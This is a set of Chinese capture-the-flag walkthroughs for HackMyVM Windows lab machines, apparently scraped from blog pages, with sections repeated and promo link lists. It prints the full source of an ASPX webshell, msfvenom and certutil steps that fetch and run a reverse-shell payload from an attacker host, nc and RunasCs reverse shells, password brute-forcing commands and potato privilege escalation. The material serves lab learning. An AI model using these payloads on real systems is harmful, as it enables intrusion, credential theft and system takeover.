HackMyVm-Zero ：简单 3.1 信息打点nmap -sS 192.168.53.9 -T4nmap -sS -p 53,88,135,139,389,445,464,593,636,3268,3269,5985 192.168.53.9 -T4 -A使用enum4linux-ng枚举目标系统信息，发现smb服务开启，且支持smb1.0协议，可能存在永恒之蓝漏洞enum4linux-ng -A 192.168.53.9 -C/3.2 漏洞扫描使用nmap进行端口漏洞扫描，确实存在永痕之蓝漏洞3.3 漏洞利用永痕之蓝漏洞直接打开MSF（复现的过程中，可能需要手工使用永痕之蓝poc，可以参考下面文章）https://hgbe02.github.io/Hackmyvm/Zero.html往期推荐全网首发！HMV全套windows机器提权，域渗透教程，2w字超详细HackMyVm-DC04 ：简单HackMyVm-DC03 ：简单HackMyVm-DC02 ：简单HackMyVm-DC01 ：简单HackMyVm-TriplAdvisor ：简单HackMyVm-Runas ：简单HackMyVm-Always ：简单HackMyVm-Nessus ：简单HackMyVm-Liar ：简单HackMyVm-Simple ：简单HackMyVm-Simple ：简单HackMyVm-Zero ：简单HackMyVm-OMG ：简单新版BurpSuite v2025.6.3汉化版，附激活教程Fine！2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具，全方位的目录爆破集成MemProcFS，Vol2和Vol3的内存取证神器重大更新！FeatherScan v4.5 内网 linux 信息收集，提权一键梭哈神器x-waf，一个基于fuzz的waf绕过渗透工具这10款内网穿透工具，一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备，microsocks，一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！一个永久的渗透知识库【oscp】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略sql注入中各种waf的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的waf防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种waf绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透

HackMyVm-quoted ：简单 2.1 信息打点web界面2.2 ftp匿名登录端口扫描，看到了可以匿名登录利用ftp匿名登录，账号ftp，密码没有，直接回车就能连接ftp服务器，发现这个ftp服务器，就是web目录，尝试使用put上传一个file.txt测试文件访问这个file文件，上传成功！2.3 获取shell我们上传一个cmdasp.aspx上去这个文件kali自带，在 /usr/share/webshells/aspx/cmdasp.aspx源码如下<%@ Page Language="C#" Debug="true" Trace="false" %><%@ Import Namespace="System.Diagnostics" %><%@ Import Namespace="System.IO" %><script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){}string ExcuteCmd(string arg){ProcessStartInfo psi = new ProcessStartInfo();psi.FileName = "cmd.exe";psi.Arguments = "/c "+arg;psi.RedirectStandardOutput = true;psi.UseShellExecute = false;Process p = Process.Start(psi);StreamReader stmrdr = p.StandardOutput;string s = stmrdr.ReadToEnd();stmrdr.Close();return s;}void cmdExe_Click(object sender, System.EventArgs e){Response.Write("<pre>");Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));Response.Write("</pre>");}</script><HTML><HEAD><title>awen asp.net webshell</title></HEAD><body ><form id="cmd" method="post" runat="server"><asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox><asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button><asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label></form></body></HTML>​<!-- Contributed by Dominic Chell (http://digitalapocalypse.blogspot.com/) --><!--    http://michaeldaw.org   04/2007    -->我们找到这个1.exe，可以使用如下cmd命令进行定位，msf注意监听，即可反弹过来where /r c:\ shell.exe # 查找在c盘指定文件的位置2.4 msf内核漏扫在meteroreter模块中使用bg命令，将这个会话运行在后台，使用本地提权扫描模块，设置好相关的配置启动扫描，这个靶机有10个提权漏洞10个提权payload 只有exploit/windows/local/ms16_075_reflection_juicy这个模块使用成功往期推荐全网首发！HMV全套windows机器提权，域渗透教程，2w字超详细HackMyVm-DC04 ：简单HackMyVm-DC03 ：简单HackMyVm-DC02 ：简单HackMyVm-DC01 ：简单HackMyVm-TriplAdvisor ：简单HackMyVm-Runas ：简单HackMyVm-Always ：简单HackMyVm-Nessus ：简单HackMyVm-Liar ：简单HackMyVm-Simple ：简单HackMyVm-Simple ：简单HackMyVm-Zero ：简单HackMyVm-OMG ：简单新版BurpSuite v2025.6.3汉化版，附激活教程Fine！2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具，全方位的目录爆破集成MemProcFS，Vol2和Vol3的内存取证神器重大更新！FeatherScan v4.5 内网 linux 信息收集，提权一键梭哈神器x-waf，一个基于fuzz的waf绕过渗透工具这10款内网穿透工具，一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备，microsocks，一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！一个永久的渗透知识库【oscp】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略sql注入中各种waf的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的waf防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种waf绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透

HackMyVm-OMG ：简单 1.1 信息打点这个靶机比较简单，主要需要考虑web的全面目录扫描，包括.开头的隐藏文件首先是80端口全端口扫描1.2 目录扫描这里有一个xampp可以利用dirsearch -u http://10.10.10.156/1.3 全面目录扫描使用各种目录扫描，爆出来一个.version隐藏文件gobuster dir -u http://10.10.10.156/dashboard/ -w /usr/share/wordlists/dirb/common.txt -x php,asp,aspx,heml,zip​wfuzz -u http://10.10.10.156/.FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --sc 200​wfuzz -u http://10.10.10.156/images/.FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --sc 200​wfuzz -u http://10.10.10.156/Webalizer/.FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --sc 200​wfuzz -u http://10.10.10.156/xampp/.FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --sc 200使用curl查看版本信息，这是php的版本curl http://10.10.10.156/xampp/.version1.4 漏洞利用漏洞原理，找了半天才找到，可以查看下面这个文章，漏洞利用如下https://github.com/php/php-src/security/advisories/GHSA-3qgc-jrrr-25jv往期推荐全网首发！HMV全套windows机器提权，域渗透教程，2w字超详细HackMyVm-DC04 ：简单HackMyVm-DC03 ：简单HackMyVm-DC02 ：简单HackMyVm-DC01 ：简单HackMyVm-TriplAdvisor ：简单HackMyVm-Runas ：简单HackMyVm-Always ：简单HackMyVm-Nessus ：简单HackMyVm-Liar ：简单HackMyVm-Simple ：简单HackMyVm-Simple ：简单HackMyVm-Zero ：简单HackMyVm-OMG ：简单新版BurpSuite v2025.6.3汉化版，附激活教程Fine！2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具，全方位的目录爆破集成MemProcFS，Vol2和Vol3的内存取证神器重大更新！FeatherScan v4.5 内网 linux 信息收集，提权一键梭哈神器x-waf，一个基于fuzz的waf绕过渗透工具这10款内网穿透工具，一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备，microsocks，一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！一个永久的渗透知识库【oscp】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略sql注入中各种waf的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的waf防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种waf绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透

全网首发！HMV全套windows机器提权，域渗透教程，2w字超详细 通过网盘分享的文件：机器地址 链接:https://pan.baidu.com/s/142B68xL_2UOhwLipeci1Kg提取码: v6h1又来码字了，正如你所见，这是一篇2w字的长文相比上一篇文章DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏这篇文章主要是基于windows的渗透教程基本下班时候回家才写的，还是很有学习价值的，很适合不了解windows渗透和域渗透的师傅们这些靶机都是免费开源的，域渗透这块也写的很详细这次靶场渗透，DC01，DC02，DC03，DC04是域渗透，也是Hackmyvm中的全部windows机器不是vulnhub上的9个dc，难度相对来说比较难，其他为提权靶机，提权linux在linux中学的比较好的话，在windows这块应该也不是问题linux渗透以及提权文章合集（基于vulnhub和红日靶场）：https://longyusec.com/longyushoulu/oscpdaba/适合刚开始学windows提权的师傅们，顺序由最简单，到最难，由提权到域渗透以及kerberos攻击、土豆提权、烂土豆提权、runas提权、msf内核漏扫、hash传递（PTH）域内SID枚举等等。如果在复现的过程中出现了什么问题，欢迎师傅们添加我的微信交流，+ baibaixiaoyu2024在开始之前，先打一波广告点击即达1、HackMyVm-OMG ：简单1.1 信息打点这个靶机比较简单，主要需要考虑web的全面目录扫描，包括.开头的隐藏文件首先是80端口全端口扫描1.2 目录扫描这里有一个xampp可以利用dirsearch -u http://10.10.10.156/1.3 全面目录扫描使用各种目录扫描，爆出来一个.version隐藏文件gobuster dir -u http://10.10.10.156/dashboard/ -w /usr/share/wordlists/dirb/common.txt -x php,asp,aspx,heml,zip ​ wfuzz -u http://10.10.10.156/.FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --sc 200 ​ wfuzz -u http://10.10.10.156/images/.FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --sc 200 ​ wfuzz -u http://10.10.10.156/Webalizer/.FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --sc 200 ​ wfuzz -u http://10.10.10.156/xampp/.FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --sc 200使用curl查看版本信息，这是php的版本curl http://10.10.10.156/xampp/.version1.4 漏洞利用漏洞原理，找了半天才找到，可以查看下面这个文章，漏洞利用如下https://github.com/php/php-src/security/advisories/GHSA-3qgc-jrrr-25jv2、HackMyVm-quoted ：简单2.1 信息打点web界面2.2 ftp匿名登录端口扫描，看到了可以匿名登录利用ftp匿名登录，账号ftp，密码没有，直接回车就能连接ftp服务器，发现这个ftp服务器，就是web目录，尝试使用put上传一个file.txt测试文件访问这个file文件，上传成功！2.3 获取shell我们上传一个cmdasp.aspx上去这个文件kali自带，在 /usr/share/webshells/aspx/cmdasp.aspx源码如下<%@ Page Language="C#" Debug="true" Trace="false" %> <%@ Import Namespace="System.Diagnostics" %> <%@ Import Namespace="System.IO" %> <script Language="c#" runat="server"> void Page_Load(object sender, EventArgs e) { } string ExcuteCmd(string arg) { ProcessStartInfo psi = new ProcessStartInfo(); psi.FileName = "cmd.exe"; psi.Arguments = "/c "+arg; psi.RedirectStandardOutput = true; psi.UseShellExecute = false; Process p = Process.Start(psi); StreamReader stmrdr = p.StandardOutput; string s = stmrdr.ReadToEnd(); stmrdr.Close(); return s; } void cmdExe_Click(object sender, System.EventArgs e) { Response.Write("<pre>"); Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text))); Response.Write("</pre>"); } </script> <HTML> <HEAD> <title>awen asp.net webshell</title> </HEAD> <body > <form id="cmd" method="post" runat="server"> <asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox> <asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button> <asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label> </form> </body> </HTML> ​ <!-- Contributed by Dominic Chell (http://digitalapocalypse.blogspot.com/) --> <!--    http://michaeldaw.org   04/2007    -->我们找到这个1.exe，可以使用如下cmd命令进行定位，msf注意监听，即可反弹过来where /r c:\ shell.exe # 查找在c盘指定文件的位置2.4 msf内核漏扫在meteroreter模块中使用bg命令，将这个会话运行在后台，使用本地提权扫描模块，设置好相关的配置启动扫描，这个靶机有10个提权漏洞10个提权payload 只有exploit/windows/local/ms16_075_reflection_juicy这个模块使用成功3、HackMyVm-Zero ：简单3.1 信息打点nmap -sS 192.168.53.9 -T4nmap -sS -p 53,88,135,139,389,445,464,593,636,3268,3269,5985 192.168.53.9 -T4 -A使用enum4linux-ng枚举目标系统信息，发现smb服务开启，且支持smb1.0协议，可能存在永恒之蓝漏洞enum4linux-ng -A 192.168.53.9 -C/3.2 漏洞扫描使用nmap进行端口漏洞扫描，确实存在永痕之蓝漏洞3.3 漏洞利用永痕之蓝漏洞直接打开MSF（复现的过程中，可能需要手工使用永痕之蓝poc，可以参考下面文章）https://hgbe02.github.io/Hackmyvm/Zero.html4、HackMyVm-Simple ：简单4.1 信息打点端口扫描web界面，通过界面可能存在的系统用户如下ruy, marcos, lander, bogo, vaiper4.2 nxc服务爆破把上面的几个用户，追加到一个字典中，并使用这些用户作为密码进行爆破或者使用rokyou.txtnxc smb 192.168.0.139 -u user -p user nxc smb 192.168.0.139 -u user -p /usr/share/wordlists/rokyou.txt发现是紫色的提示，翻译一下错误就能发现，这密码过期了，需要登录到虚拟机上修改这个账号的密码4.3 近源攻击按esc进入用户列表，选择bogo用户：输入正确的密码bogo后，需要你修改密码尝试执行命令，一切正常4.4 smb渗透再来到smb登录这块，就能正常登录了再LOGS共享文件中发现了一个日志文件，使用get命令将它下载下来尝试将之前的用户字典上传上去，使用put命令，发现没有上传权限日志内容┌──(root㉿kali)-[/data/demo] └─# cat 20231008.log PS C:\> dir \\127.0.0.1\WEB Acceso denegado At line:1 char:1 + dir \\127.0.0.1\WEB + ~~~~~~~~~~~~~~~~~~~    + CategoryInfo         : PermissionDenied: (\\127.0.0.1\WEB:String) [Get-ChildItem], UnauthorizedAccessException    + FullyQualifiedErrorId : ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand Cannot find path '\\127.0.0.1\WEB' because it does not exist. At line:1 char:1 + dir \\127.0.0.1\WEB + ~~~~~~~~~~~~~~~~~~~    + CategoryInfo         : ObjectNotFound: (\\127.0.0.1\WEB:String) [Get-ChildItem], ItemNotFoundException    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand ​ PS C:\> net use \\127.0.0.1\WEB Se ha completado el comando correctamente. ​ PS C:\> dir \\127.0.0.1\WEB Acceso denegado At line:1 char:1 + dir \\127.0.0.1\WEB + ~~~~~~~~~~~~~~~~~~~    + CategoryInfo         : PermissionDenied: (\\127.0.0.1\WEB:String) [Get-ChildItem], UnauthorizedAccessException    + FullyQualifiedErrorId : ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand Cannot find path '\\127.0.0.1\WEB' because it does not exist. At line:1 char:1 + dir \\127.0.0.1\WEB + ~~~~~~~~~~~~~~~~~~~    + CategoryInfo         : ObjectNotFound: (\\127.0.0.1\WEB:String) [Get-ChildItem], ItemNotFoundException    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand ​ PS C:\> net use \\127.0.0.1\WEB /user:marcos SuperPassword Se ha completado el comando correctamente. ​ PS C:\> dir \\127.0.0.1\WEB ​    Directorio: \\127.0.0.1\WEB ​ Mode                LastWriteTime         Length Name ----                -------------         ------ ---- d-----        10/8/2023   9:46 PM                aspnet_client -a----        9/26/2023   6:46 PM            703 iisstart.htm -a----        10/8/2023  10:46 PM            158 test.php ​ PS C:\> rm \\127.0.0.1\WEB\*.php ​ PS C:\> dir \\127.0.0.1\WEB ​    Directorio: \\127.0.0.1\WEB ​ Mode                LastWriteTime         Length Name ----                -------------         ------ ---- d-----        10/8/2023   9:46 PM                aspnet_client -a----        9/26/2023   6:46 PM            703 iisstart.htm ​ PS C:\>又得到了一个账号密码user:marcos SuperPassword这个用户也是一样，密码过期，需要重新设置一下密码，重复之前的步骤就好了尝试使用put将一个文件上传上去，上传成功！有上传的权限，那么就可以将aspx马上传上去（这里的web大概率就是网站的web目录了）4.5 获取shell尝试使用put命令上传文件cd /usr/share/webshells/aspx smbclient //192.168.0.139/WEB/ -U marcos # 密码 SuperPassword put cmdasp.aspx访问这个马使用msfvenom生成反弹shell的木马msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.147 LPORT=4444 -f exe -o shell.exe ​ python3 -m http.server使用下载命令，将这个木马上传到靶机上certutil -urlcache -split -f http://192.168.0.147:8000/shell.exe c:\shell.exe # 或者利用smbclient上传也可以，此时只需要输入一个shell.exe在那个aspx命令执行界面打开msf启动监听use multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.0.147 run在命令执行的aspx的输入框中输入这个shell.exe的绝对路径就可以执行，利用下面这个命令定位马的位置where /r c:\ shell.exec:\inetpub\wwwroot\shell.exe执行马4.6 msf内核漏洞扫描bg use multi/recon/local_exploit_suggester set session 1 run尝试利用扫描出来的漏洞use windows/local/cve_2020_0787_bits_arbitrary_file_move存在漏洞但是始终没有创建shell会话找到CVE-2020-0787的exp# 源码 https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION.git# 创建好的https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION/releases/download/1/BitsArbitraryFileMoveExploit.exe此时去上传文件（这里我换了一个网，ip就变了，我用的桥接模式，使用vmbox用nat模式会出问题，导致vmware的虚拟器kali访问不到vmbox，这是最简单的解决方法）smbclient //192.168.110.46/WEB/ -U marcos put BitsArbitraryFileMoveExploit.exe提权失败4.7 土豆提权切换提权方式土豆提权，将这些全都下载下来https://github.com/BeichenDream/GodPotato/releases/tag/V1.20可以看到这里我们执行的whoami已经是系统权限了，此时我们只需要添加一个反弹一个shell到本地来就可以了msf反弹shellshell反弹过来后，却不是system权限，接下来要将这个木马设置为系统权限，而不是这个用户的文件，类似于linux中的属主4.8 修改文件权限GodPotato-NET4.exe -cmd "cmd /c takeown /f c:\inetpub\wwwroot\shell.exe /a"重新反弹即可5、HackMyVm-Liar ：简单5.1 信息打点nmap -sS 192.168.53.131 -p- -T4这里有一个用户名nica使用nmap进行详细的端口扫描nmap -sS 192.168.53.131 -p 80,135,139,445,5985,47001,49664,49665,49666,49667,49668,49677 -T4 -A5.2 enum4linux枚举使用enum4linux-ng枚举目标系统信息，smb服务器开启enum4linux-ng -A 192.168.53.131 -C尝试免密登录，登录失败了smbclient -L //192.168.53.131/ -N这个免密登录 -N参数就代表着： “空用户名 + 空密码” 的身份，在 Windows 系统中对应的就是anonymous用户也就是相当于你执行了命令 smbclient -L\192.168.56.114 -U anonymous5.3 nxc内网渗透使用smb爆破nxc smb 192.168.53.131 -u nica -p /usr/share/wordlists/metasploit/burnett_top_1024.txt爆破结果nica:hardcore，使用账号密码登录smb服务器从当前操作结果来看，nica用户虽然凭据有效（能登录IPC$），但权限较低，无法访问C$、ADMIN$等敏感共享5.4 远程连接5985端口开启 ，使用windows版本的ssh连接此服务，可以看到能正常执行命令，登录成功evil-winrm -i 192.168.53.131 -u nica -p hardcore看看有哪些用户，大概率就是akanksha用户继续获得其他信息了继续爆破nxc smb 192.168.53.131 -u akanksha -p /usr/share/wordlists/rockyou.txt这也是一个低权限用户这里就连接不上了evil-winrm -i 192.168.53.131 -u akanksha -p sweetgirl5.5 RunasCs提权那么我们使用工具https://github.com/antonioCoco/RunasCs以指定用户权限执行命令*Evil-WinRM* PS C:\Users\nica> upload RunasCs.exe                                         Info: Uploading /root/Desktop/RunasCs.exe to C:\Users\nica\RunasCs.exe                                         Data: 68948 bytes of 68948 bytes copied                                         Info: Upload successful! *Evil-WinRM* PS C:\Users\nica> dir ​ ​    Directorio: C:\Users\nica ​ ​ Mode                LastWriteTime         Length Name ----                -------------         ------ ---- d-r---        9/15/2018   9:12 AM                Desktop d-r---        9/26/2023   6:44 PM                Documents d-r---        9/15/2018   9:12 AM                Downloads d-r---        9/15/2018   9:12 AM                Favorites d-r---        9/15/2018   9:12 AM                Links d-r---        9/15/2018   9:12 AM                Music d-r---        9/15/2018   9:12 AM                Pictures d-----        9/15/2018   9:12 AM                Saved Games d-r---        9/15/2018   9:12 AM                Videos -a----        7/14/2024  10:49 PM          51712 RunasCs.exe -a----        9/26/2023   6:44 PM             10 user.txt ​ ​ *Evil-WinRM* PS C:\Users\nica> ./RunasCs.exe akanksha sweetgirl cmd.exe -r 192.168.53.51:4567 ​ [+] Running in session 0 with process function CreateProcessWithLogonW() [+] Using Station\Desktop: Service-0x0-2922e6$\Default [+] Async process 'C:\Windows\system32\cmd.exe' with pid 2496 created in background.> nc -lvnp 4567                                                         listening on [any] 4567 ... connect to [192.168.53.51] from (UNKNOWN) [192.168.53.131] 49674 Microsoft Windows [Versi�n 10.0.17763.107] (c) 2018 Microsoft Corporation. Todos los derechos reservados. ​ C:\Windows\system32>成功弹回了shellC:\Users>whoami /groups whoami /groupsINFORMACI�N DE GRUPO--------------------Nombre de grupo Tipo SID Atributos============================================ ============== ============================================== ========================================================================Todos Grupo conocido S-1-1-0 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitadoWIN-IURF14RBVGV\Idministritirs Alias S-1-5-21-2519875556-2276787807-2868128514-1002 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitadoBUILTIN\Usuarios Alias S-1-5-32-545 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitadoNT AUTHORITY\INTERACTIVE Grupo conocido S-1-5-4 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitadoINICIO DE SESI�N EN LA CONSOLA Grupo conocido S-1-2-1 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitadoNT AUTHORITY\Usuarios autentificados Grupo conocido S-1-5-11 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitadoNT AUTHORITY\Esta compa��a Grupo conocido S-1-5-15 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitadoNT AUTHORITY\Cuenta local Grupo conocido S-1-5-113 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitadoNT AUTHORITY\Autenticaci�n NTLM Grupo conocido S-1-5-64-10 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitadoEtiqueta obligatoria\Nivel obligatorio medio Etiqueta S-1-16-8192所属组是Idministritirs 也就是AdministratorC:\Users\Administrador>dir dir El volumen de la unidad C no tiene etiqueta. El n�mero de serie del volumen es: 26CD-AE41Directorio de C:\Users\Administrador26/09/2023 18:36 <DIR> .26/09/2023 18:36 <DIR> ..26/09/2023 15:11 <DIR> 3D Objects26/09/2023 15:11 <DIR> Contacts26/09/2023 15:11 <DIR> Desktop26/09/2023 15:11 <DIR> Documents26/09/2023 15:11 <DIR> Downloads26/09/2023 15:11 <DIR> Favorites26/09/2023 15:11 <DIR> Links26/09/2023 15:11 <DIR> Music26/09/2023 15:24 16.418 new.cfg26/09/2023 15:11 <DIR> Pictures26/09/2023 18:36 13 root.txt26/09/2023 15:11 <DIR> Saved Games26/09/2023 15:11 <DIR> Searches26/09/2023 15:11 <DIR> Videos2 archivos 16.431 bytes14 dirs 45.911.502.848 bytes libresC:\Users\Administrador>type root.txttype root.txtHMV1******6、HackMyVm-Nessus ：简单6.1 端口扫描6.2 漏洞扫描nmap -sS -p 135,139,445,5985,8834 192.168.53.238 -T4 -A --script=vuln在访问这个端口的时候，提示你需要使用https访问那就使用https访问，没有账号密码，登录不进去6.3 查看smb服务尝试免密连接smb服务，可以正常连接，并且里面有两个PDF看看什么内容My Basic Network Scan_hwhm7q.pdfWeb Application Tests_f6jg9t.pdf发现作者信息，joseexiftool [pdf]6.4 爆破Nessus后台前面已经发现了，smb是可以免密登录的，那么现在就只有nessus爆破了，来到nessus登录界面，抓包，添加爆破的payload根据这些数据包，使用wfuzz进行爆破因为要用到kali中的rockyou.txt字典（也可以将rockyou.txt传到本机windows进行爆破）wfuzz -c -z file,/usr/share/wordlists/rockyou.txt \  -X POST \  -H "Host: 192.168.53.238:8834" \  -H "X-Api-Token: 4c746180-a399-4abd-a9a0-49055fac236f" \  -H "Content-Type: application/json" \  -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36" \  -H "Origin: https://192.168.53.238:8834" \  -H "Referer: https://192.168.53.238:8834/" \  -d '{"username":"jose","password":"FUZZ"}' \  --hc 401,403 \  -f result.txt,raw \  https://192.168.53.238:8834/session得到密码，tequiero当前nessus版本为10.7.3，应该是比较新的，没有什么漏洞，或者漏洞没有公开（去网上搜了下，可能有一个本地提权漏洞，但是exp没有公开）6.5 盗取认证信息来到代理界面，尝试查看源码查看密码，查看失败那么就利用代理，发送数据包到kali中，看看有没有密码出现，kali记得开nckali得到的信息，没有密码信息一个一个切换，当我切换到basic这个内容nc接收到的数据包如下，发现一段密文得到认证信息，解密后就是账号密码nesus:Z#JuXH$ph-;v@,X&mV)得到账号密码，和之前那个靶机一样，需要修改登录的密码，这个已经过期了nxc smb 192.168.53.238 -u nesus -p 'Z#JuXH$ph-;v@,X&mV)'6.6 近源攻击！！按两次Esc键，来到选择账户界面修改你的账号密码修改密码为123456，登录smb，发现什么也没有6.7 远程连接那就来到5985端口，执行命令成功！evil-winrm -i 192.168.53.238 -u nesus -p 1234566.8 反弹shell这里我尝试了各种msf的木马，都被杀软给杀了，无意间使用nc的时候就不会被杀，使用nc进行反弹shell（kali记得开监听）./nc.exe 192.168.53.51 1234 -e cmd6.9 提权6.9.1 local_exploit_suggester提权打开msf（这一步其实很多余，这样子是扫不出来的，基本只有后渗透模块meterperter才能使用）msfconsole use exploit/multi/handler # 加载handler模块 # 根据目标系统选择payload（nc反弹的是基础shell，非meterpreter）# 目标是Windows，接收nc命令反弹的shell：set PAYLOAD windows/shell_reverse_tcpset LHOST 192.168.53.51 # 攻击机IP（与nc反弹目标一致）set LPORT 1234 # 监听端口（与nc反弹端口一致）run -j # 启动监听，保持后台执行use multi/recon/local_exploit_suggester # 使用本地提权漏扫模块set session 3 # 设置反弹成功的会话id为3，使用 sessions 即可查看所有的会话id6.9.2 PrivescCheck提权内网常见的提权和信息收集文章参考：https://www.cnblogs.com/Hekeats-L/p/16879325.html工具链接：https://github.com/itm4n/PrivescCheck/releases/tag/2025.10.06-1upload PrivescCheck.ps1 Set-ExecutionPolicy Bypass -Scope process -Force ./PrivescCheck.ps1 # 或者. .\PrivescCheck.ps1 